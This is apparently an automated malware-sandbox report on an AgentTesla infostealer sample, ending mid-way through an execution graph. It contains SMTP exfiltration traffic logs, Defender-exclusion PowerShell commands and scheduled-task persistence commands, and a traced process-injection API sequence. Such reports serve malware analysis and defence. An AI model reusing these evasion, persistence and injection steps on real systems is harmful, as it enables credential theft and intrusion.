                                          Dec 9, 2024 07:02:43.088552952 CET5875000177.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-72.klg.yp-c.yandex.net Ok 1733724162-g2epjKSOqqM0
                                          Dec 9, 2024 07:02:43.088716030 CET50001587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:02:43.527134895 CET5875000177.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-72.klg.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:02:43.527306080 CET50001587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:02:43.976969004 CET5875000177.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:02:54.281127930 CET5875000277.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-95.klg.yp-c.yandex.net Ok 1733724174-r2ekCSSOdCg0
                                          Dec 9, 2024 07:02:54.281337023 CET50002587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:02:54.719028950 CET5875000277.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-95.klg.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:02:54.719227076 CET50002587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:02:55.156197071 CET5875000277.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:02:58.002415895 CET5875000377.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-60.sas.yp-c.yandex.net Ok 1733724177-v2e8e0VOpmI0
                                          Dec 9, 2024 07:02:58.003041029 CET50003587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:02:58.444470882 CET5875000377.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-60.sas.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:02:58.444612026 CET50003587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:03:00.312143087 CET5875000477.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-31.sas.yp-c.yandex.net Ok 1733724180-x2eTNBVOjqM0
                                          Dec 9, 2024 07:03:00.312283993 CET50004587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:03:00.759303093 CET5875000477.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-31.sas.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:03:00.759465933 CET50004587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:03:01.211013079 CET5875000477.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:03:14.180912018 CET5875000677.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-67.vla.yp-c.yandex.net Ok 1733724193-D3eMFjWOlGk0
                                          Dec 9, 2024 07:03:14.181612968 CET50006587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:03:14.630472898 CET5875000677.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-67.vla.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:03:14.630660057 CET50006587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:03:15.079833984 CET5875000677.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:03:26.033431053 CET5875000777.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-31.vla.yp-c.yandex.net Ok 1733724205-P3eT8mWOca60
                                          Dec 9, 2024 07:03:26.033561945 CET50007587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:03:26.477101088 CET5875000777.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-31.vla.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:03:26.477279902 CET50007587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:03:26.919924974 CET5875000777.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:03:30.418437958 CET5875000977.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-95.klg.yp-c.yandex.net Ok 1733724210-U3exTSSOq4Y0
                                          Dec 9, 2024 07:03:30.418582916 CET50009587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:03:30.858071089 CET5875000977.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-95.klg.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:03:30.858217001 CET50009587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:03:31.298667908 CET5875000977.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:03:36.000834942 CET5875001077.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-78.myt.yp-c.yandex.net Ok 1733724215-Z3epR8MOq8c0
                                          Dec 9, 2024 07:03:39.287240982 CET50010587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:03:40.719456911 CET5875001177.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-31.vla.yp-c.yandex.net Ok 1733724220-e3eHFmWOhGk0
                                          Dec 9, 2024 07:03:40.733187914 CET50011587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:03:40.853674889 CET5875001277.88.21.158192.168.2.9220 mail-nwsmtp-smtp-production-main-36.iva.yp-c.yandex.net Ok 1733724220-e3eGsnJOiuQ0
                                          Dec 9, 2024 07:03:40.853818893 CET50012587192.168.2.977.88.21.158EHLO 226533
                                          Dec 9, 2024 07:03:41.179744005 CET5875001177.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-31.vla.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:03:41.179949045 CET50011587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:03:41.292591095 CET5875001277.88.21.158192.168.2.9250-mail-nwsmtp-smtp-production-main-36.iva.yp-c.yandex.net
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-SIZE 53477376
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN XOAUTH2
                                          250-DSN
                                          250 ENHANCEDSTATUSCODES
                                          Dec 9, 2024 07:03:41.292793989 CET50012587192.168.2.977.88.21.158STARTTLS
                                          Dec 9, 2024 07:03:41.626732111 CET5875001177.88.21.158192.168.2.9220 Go ahead
                                          Dec 9, 2024 07:03:41.731415987 CET5875001277.88.21.158192.168.2.9220 Go ahead

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:00:59:27
                                          Start date:09/12/2024
                                          Path:C:\Users\user\Desktop\file.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                          Imagebase:0xd30000
                                          File size:738'304 bytes
                                          MD5 hash:F76DE5E39251D01E3FAE90CC04705F71
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1410116787.00000000040D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1410116787.00000000040D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.1410116787.00000000040D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:00:59:29
                                          Start date:09/12/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
                                          Imagebase:0x4b0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:00:59:29
                                          Start date:09/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff70f010000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:00:59:32
                                          Start date:09/12/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NnXVkDOvj.exe"
                                          Imagebase:0x4b0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:00:59:32
                                          Start date:09/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff70f010000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:00:59:32
                                          Start date:09/12/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpD1A2.tmp"
                                          Imagebase:0xa00000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:9
                                          Start time:00:59:32
                                          Start date:09/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff70f010000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:00:59:33
                                          Start date:09/12/2024
                                          Path:C:\Users\user\Desktop\file.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                          Imagebase:0x150000
                                          File size:738'304 bytes
                                          MD5 hash:F76DE5E39251D01E3FAE90CC04705F71
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:00:59:33
                                          Start date:09/12/2024
                                          Path:C:\Users\user\Desktop\file.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                          Imagebase:0x2e0000
                                          File size:738'304 bytes
                                          MD5 hash:F76DE5E39251D01E3FAE90CC04705F71
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:12
                                          Start time:00:59:33
                                          Start date:09/12/2024
                                          Path:C:\Users\user\Desktop\file.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                          Imagebase:0xd90000
                                          File size:738'304 bytes
                                          MD5 hash:F76DE5E39251D01E3FAE90CC04705F71
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000C.00000002.3811121653.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:13
                                          Start time:00:59:35
                                          Start date:09/12/2024
                                          Path:C:\Users\user\AppData\Roaming\NnXVkDOvj.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\NnXVkDOvj.exe
                                          Imagebase:0xeb0000
                                          File size:738'304 bytes
                                          MD5 hash:F76DE5E39251D01E3FAE90CC04705F71
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 29%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:14
                                          Start time:00:59:37
                                          Start date:09/12/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpE3F1.tmp"
                                          Imagebase:0xa00000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:15
                                          Start time:00:59:37
                                          Start date:09/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff70f010000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:16
                                          Start time:00:59:37
                                          Start date:09/12/2024
                                          Path:C:\Users\user\AppData\Roaming\NnXVkDOvj.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\NnXVkDOvj.exe"
                                          Imagebase:0x4a0000
                                          File size:738'304 bytes
                                          MD5 hash:F76DE5E39251D01E3FAE90CC04705F71
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000010.00000002.3811125875.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:12.2%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:1.8%
                                            Total number of Nodes:608
                                            Total number of Limit Nodes:42
                                            execution_graph 77426 2ec4668 77427 2ec4672 77426->77427 77431 2ec4758 77426->77431 77436 2ec3e1c 77427->77436 77429 2ec468d 77432 2ec475d 77431->77432 77440 2ec4858 77432->77440 77444 2ec4868 77432->77444 77437 2ec3e27 77436->77437 77452 2ec5bfc 77437->77452 77439 2ec6f90 77439->77429 77441 2ec4868 77440->77441 77443 2ec496c 77441->77443 77448 2ec449c 77441->77448 77445 2ec488f 77444->77445 77446 2ec496c 77445->77446 77447 2ec449c CreateActCtxA 77445->77447 77446->77446 77447->77446 77449 2ec58f8 CreateActCtxA 77448->77449 77451 2ec59bb 77449->77451 77453 2ec5c07 77452->77453 77456 2ec5c1c 77453->77456 77455 2ec712d 77455->77439 77457 2ec5c27 77456->77457 77460 2ec5c4c 77457->77460 77459 2ec7202 77459->77455 77461 2ec5c57 77460->77461 77462 2ec5c7c 4 API calls 77461->77462 77463 2ec7305 77462->77463 77463->77459 77629 c2fa6e8 77630 c2faae8 77629->77630 77631 c2fa753 77629->77631 77631->77630 77632 767efb0 4 API calls 77631->77632 77632->77630 77134 7598e50 77135 7598e9e DrawTextExW 77134->77135 77137 7598ef6 77135->77137 77138 c2fb020 77140 c2fb048 77138->77140 77142 c2f9dac 77140->77142 77144 c2f9db7 77142->77144 77143 c2fb6cf 77145 c2fb709 77143->77145 77158 b9b5840 77143->77158 77164 b9b5831 77143->77164 77144->77143 77144->77145 77150 7785848 77144->77150 77154 77835b8 77144->77154 77151 7785858 77150->77151 77170 767efb0 77151->77170 77152 778586c 77152->77143 77155 77835c3 77154->77155 77157 767efb0 4 API calls 77155->77157 77156 778586c 77156->77143 77157->77156 77161 b9b58a5 77158->77161 77159 b9b4790 PeekMessageW 77159->77161 77161->77159 77163 b9b58f2 77161->77163 77236 b9b47a8 77161->77236 77239 b9b47dc 77161->77239 77163->77145 77167 b9b58a5 77164->77167 77165 b9b58f2 77165->77145 77166 b9b4790 PeekMessageW 77166->77167 77167->77165 77167->77166 77168 b9b47a8 KiUserCallbackDispatcher 77167->77168 77169 b9b47dc DispatchMessageW 77167->77169 77168->77167 77169->77167 77171 767efd6 77170->77171 77172 767efea 77171->77172 77175 2ecde88 77171->77175 77181 2ecde78 77171->77181 77172->77152 77177 2ecdeb6 77175->77177 77176 2ecdf87 77179 2ecdff3 77176->77179 77187 2eccac4 77176->77187 77177->77176 77177->77179 77180 2ecdf82 KiUserCallbackDispatcher 77177->77180 77180->77176 77182 2ecde88 77181->77182 77183 2ecdff3 77182->77183 77184 2ecdf87 77182->77184 77186 2ecdf82 KiUserCallbackDispatcher 77182->77186 77184->77183 77185 2eccac4 2 API calls 77184->77185 77185->77183 77186->77184 77188 2eccacf 77187->77188 77191 2ecdde8 77188->77191 77190 2ecf5af 77190->77179 77193 2ecddf3 77191->77193 77192 2ecf758 77192->77190 77193->77192 77195 2ecf682 77193->77195 77199 2ecf768 77193->77199 77194 2ecf721 77203 767fe48 77194->77203 77195->77194 77196 2ecdde8 2 API calls 77195->77196 77196->77195 77200 2ecf745 77199->77200 77201 2ecf772 77199->77201 77202 767fe48 2 API calls 77200->77202 77201->77195 77202->77199 77205 767fe5a 77203->77205 77204 767fe97 77204->77192 77205->77204 77209 b9b0040 77205->77209 77213 b9b0007 77205->77213 77217 b9b0269 77205->77217 77211 b9b0063 77209->77211 77210 b9b0262 77210->77204 77211->77210 77221 b9b0618 77211->77221 77214 b9b003a 77213->77214 77215 b9b0262 77214->77215 77216 b9b0618 2 API calls 77214->77216 77215->77204 77216->77215 77219 b9b0224 77217->77219 77218 b9b0262 77218->77204 77219->77218 77220 b9b0618 2 API calls 77219->77220 77220->77218 77222 b9b064f 77221->77222 77226 b9b09c7 77222->77226 77231 b9b09eb 77222->77231 77223 b9b0673 77227 b9b09ec 77226->77227 77228 b9b09cd 77226->77228 77229 b9b0c28 PostMessageW 77227->77229 77230 b9b0c00 PostMessageW 77227->77230 77228->77223 77229->77228 77230->77228 77232 b9b09fe 77231->77232 77234 b9b0c28 PostMessageW 77232->77234 77235 b9b0c00 PostMessageW 77232->77235 77233 b9b0a21 77233->77223 77234->77233 77235->77233 77237 b9b61a8 KiUserCallbackDispatcher 77236->77237 77238 b9b621c 77237->77238 77238->77161 77240 b9b6680 DispatchMessageW 77239->77240 77241 b9b66ec 77240->77241 77241->77161 77464 ba6a230 77465 ba6a245 77464->77465 77468 ba6a261 77465->77468 77466 ba6a257 77469 ba6a28a 77468->77469 77470 ba6a292 77469->77470 77484 ba6a82e 77469->77484 77488 ba6ada5 77469->77488 77491 ba6a75f 77469->77491 77495 ba6a838 77469->77495 77499 ba6a893 77469->77499 77506 ba6a6b0 77469->77506 77510 ba6adf6 77469->77510 77514 ba6ae92 77469->77514 77518 ba6a6eb 77469->77518 77522 ba6a9c8 77469->77522 77527 ba6aa8d 77469->77527 77531 ba6acca 77469->77531 77535 ba6ac85 77469->77535 77470->77466 77485 ba6a824 77484->77485 77486 ba6aef9 77485->77486 77539 767c648 77485->77539 77486->77470 77543 767c3c0 77488->77543 77492 ba6a6bc 77491->77492 77547 767d018 77492->77547 77496 ba6a853 77495->77496 77551 767c558 77496->77551 77500 ba6a8a5 77499->77500 77555 767c498 77500->77555 77502 ba6b0a9 77502->77470 77503 ba6a874 77503->77470 77504 767c558 WriteProcessMemory 77504->77503 77507 ba6a6bc 77506->77507 77509 767d018 CreateProcessA 77507->77509 77508 ba6a7f9 77508->77470 77509->77508 77511 ba6b0af 77510->77511 77513 767c3c0 Wow64SetThreadContext 77511->77513 77512 ba6b0ca 77513->77512 77517 767c648 ReadProcessMemory 77514->77517 77515 ba6aef9 77515->77470 77516 ba6a824 77516->77514 77516->77515 77517->77516 77519 ba6a6f1 77518->77519 77521 767d018 CreateProcessA 77519->77521 77520 ba6a7f9 77520->77470 77521->77520 77526 767c558 WriteProcessMemory 77522->77526 77523 ba6a9f4 77524 ba6aacb 77523->77524 77559 767c310 77523->77559 77524->77470 77526->77523 77528 ba6aab6 77527->77528 77530 767c310 ResumeThread 77528->77530 77529 ba6aacb 77530->77529 77532 ba6aa9f 77531->77532 77534 767c310 ResumeThread 77532->77534 77533 ba6aacb 77534->77533 77536 ba6ac95 77535->77536 77538 767c558 WriteProcessMemory 77536->77538 77537 ba6aff8 77538->77537 77540 767c693 ReadProcessMemory 77539->77540 77542 767c6d7 77540->77542 77542->77485 77544 767c405 Wow64SetThreadContext 77543->77544 77546 767c44d 77544->77546 77548 767d0a1 CreateProcessA 77547->77548 77550 767d263 77548->77550 77552 767c5a0 WriteProcessMemory 77551->77552 77554 767c5f7 77552->77554 77554->77470 77556 767c4d8 VirtualAllocEx 77555->77556 77558 767c515 77556->77558 77558->77502 77558->77504 77560 767c350 ResumeThread 77559->77560 77562 767c381 77560->77562 77562->77524 77242 7789860 77243 778988e 77242->77243 77244 7789919 77243->77244 77246 7788980 77243->77246 77244->77244 77247 778898b 77246->77247 77249 7789a20 77247->77249 77250 77889b0 77247->77250 77249->77244 77251 7789b60 SetTimer 77250->77251 77252 7789bcc 77251->77252 77252->77249 77253 7592640 77254 759267a 77253->77254 77255 759270b 77254->77255 77256 75926f6 77254->77256 77258 75903c8 3 API calls 77255->77258 77261 75903c8 77256->77261 77260 759271a 77258->77260 77262 75903d3 77261->77262 77263 7592701 77262->77263 77266 75930f0 77262->77266 77272 7593100 77262->77272 77268 759311a 77266->77268 77278 759041c 77266->77278 77269 7593127 77268->77269 77270 7593150 CreateIconFromResourceEx 77268->77270 77269->77263 77271 75931ce 77270->77271 77271->77263 77273 759041c CreateIconFromResourceEx 77272->77273 77275 759311a 77273->77275 77274 7593127 77274->77263 77275->77274 77276 7593150 CreateIconFromResourceEx 77275->77276 77277 75931ce 77276->77277 77277->77263 77279 7593150 CreateIconFromResourceEx 77278->77279 77280 75931ce 77279->77280 77280->77268 77633 c2fb8f6 77636 c2fb0c8 77633->77636 77637 c2fb0d3 77636->77637 77641 c2fc108 77637->77641 77645 c2fc118 77637->77645 77638 c2fb903 77642 c2fc167 77641->77642 77649 c2fb1bc 77642->77649 77646 c2fc167 77645->77646 77647 c2fb1bc EnumThreadWindows 77646->77647 77648 c2fc1e8 77647->77648 77648->77638 77652 c2fc208 EnumThreadWindows 77649->77652 77651 c2fc1e8 77651->77638 77652->77651 77563 b9b4b00 77564 b9b4b12 77563->77564 77565 b9b4c2d 77564->77565 77568 c2fef10 77564->77568 77572 c2fcc48 77564->77572 77570 c2fef1a 77568->77570 77569 c2fefde 77569->77565 77570->77569 77571 c2fefdc KiUserCallbackDispatcher 77570->77571 77571->77569 77573 c2fcc53 77572->77573 77574 c2fefde 77573->77574 77575 c2fefdc KiUserCallbackDispatcher 77573->77575 77574->77565 77575->77574 77653 ba63978 77654 ba63987 77653->77654 77655 ba639a6 77654->77655 77658 ba63a69 77654->77658 77662 ba63a78 77654->77662 77659 ba63a86 77658->77659 77660 ba63a91 KiUserCallbackDispatcher 77659->77660 77661 ba63a9a 77659->77661 77660->77661 77661->77655 77663 ba63a86 77662->77663 77664 ba63a91 KiUserCallbackDispatcher 77663->77664 77665 ba63a9a 77663->77665 77664->77665 77665->77655 77576 c2f2fb0 77577 c2f2fbf 77576->77577 77578 c2f2fc9 77576->77578 77581 c2f3018 77577->77581 77587 c2f3020 77577->77587 77582 c2f302b 77581->77582 77583 c2f3032 77581->77583 77593 c2ff559 77582->77593 77598 c2ff560 77582->77598 77583->77578 77584 c2f3030 77584->77578 77588 c2f302b 77587->77588 77589 c2f3032 77587->77589 77591 c2ff559 KiUserCallbackDispatcher 77588->77591 77592 c2ff560 KiUserCallbackDispatcher 77588->77592 77589->77578 77590 c2f3030 77590->77578 77591->77590 77592->77590 77594 c2ff58b 77593->77594 77595 c2fcc48 KiUserCallbackDispatcher 77594->77595 77597 c2ff5e3 77594->77597 77596 c2ff5dc 77595->77596 77596->77584 77597->77584 77599 c2ff58b 77598->77599 77600 c2ff5e3 77599->77600 77601 c2fcc48 KiUserCallbackDispatcher 77599->77601 77600->77584 77602 c2ff5dc 77601->77602 77602->77584 77666 c2fcef0 77667 c2fcf09 77666->77667 77673 c2fcf50 77666->77673 77668 c2fcf2a 77667->77668 77669 c2fcf13 77667->77669 77667->77673 77671 c2fcf33 77668->77671 77672 c2fd0b0 77668->77672 77670 c2fd139 77669->77670 77680 c2fcf1c 77669->77680 77696 c2fb398 77670->77696 77676 c2fcf42 77671->77676 77677 c2fd209 77671->77677 77678 c2fd1e8 77671->77678 77679 c2fd227 77671->77679 77671->77680 77682 c2fd147 77671->77682 77686 c2fd09d 77671->77686 77691 c2fd056 77671->77691 77692 c2fb348 77672->77692 77673->77677 77673->77678 77673->77679 77673->77680 77676->77680 77683 c2fd1cc 77676->77683 77688 c2f3020 KiUserCallbackDispatcher 77677->77688 77687 c2f3020 KiUserCallbackDispatcher 77678->77687 77684 c2f3020 KiUserCallbackDispatcher 77679->77684 77681 c2f3020 KiUserCallbackDispatcher 77680->77681 77680->77686 77681->77686 77689 c2f3020 KiUserCallbackDispatcher 77682->77689 77700 c2fb438 KiUserCallbackDispatcher 77683->77700 77684->77686 77687->77686 77688->77686 77689->77686 77690 c2f3020 KiUserCallbackDispatcher 77690->77686 77691->77690 77694 c2fb353 77692->77694 77701 c2fcbf8 77694->77701 77695 